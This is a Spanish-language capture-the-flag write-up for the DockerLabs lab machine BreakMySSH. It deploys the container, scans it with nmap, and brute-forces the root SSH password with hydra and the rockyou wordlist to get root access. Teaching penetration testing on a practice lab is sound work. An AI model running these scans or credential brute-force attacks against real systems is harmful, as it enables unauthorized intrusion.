Skip to content

BreakMySSH

This content is not available in your language yet.

En este artículo, detallaré el proceso de resolución del CTF de la máquina virtual BreakMySSH. Explico paso a paso las técnicas empleadas para identificar y explotar las vulnerabilidades disponibles.

  • Nombre: BreakMySSH
  • Autor: El Pingüino de Mario
  • Dificultad: Muy Fácil
  • Fecha de creación: 29/05/2024
  • Descargamos la máquina desde DockerLabs.

  • Descomprimimos el archivo .zip:

    Ventana de terminal
    unzip BreakMySSH.zip
  • Ejecutamos el script de despliegue:

    Ventana de terminal
    sudo bash auto_deplo.sh BreakMySSH.tar

La IP se proporciona automáticamente al desplegar la máquina, por lo que no es necesario realizar un escaneo ARP.

ip

Creamos una estructura de trabajo ordenada:

Ventana de terminal
mkdir BreakMySSH
cd BreakMySSH
mkt # Crea carpetas: content, exploits, nmap y scripts

Realizamos un escaneo completo de puertos con Nmap:

Ventana de terminal
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPorts

Extraemos los puertos abiertos:

Ventana de terminal
extractPorts allPorts

Ports

Realizamos un escaneo más específico de los servicios encontrados:

Ventana de terminal
nmap -sCV -p22 172.17.0.2 -oN targeted

Resultado:

Services

El puerto SSH (22) es el único abierto. El nombre de la máquina sugiere que debemos enfocarnos en este servicio.

Realizamos un ataque de fuerza bruta con hydra, utilizando como usuario root:

Ventana de terminal
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://172.18.0.2 -t 4

hydra

Hydra encuentra la contraseña válida para root, lo que nos permite acceder directamente mediante SSH.

No es necesaria, ya que obtuvimos acceso como usuario root.

Root

  • La máquina cumple con su nivel de dificultad anunciado: muy fácil.
  • Resultó ideal para practicar ataques de fuerza bruta y escaneo básico de puertos y servicios.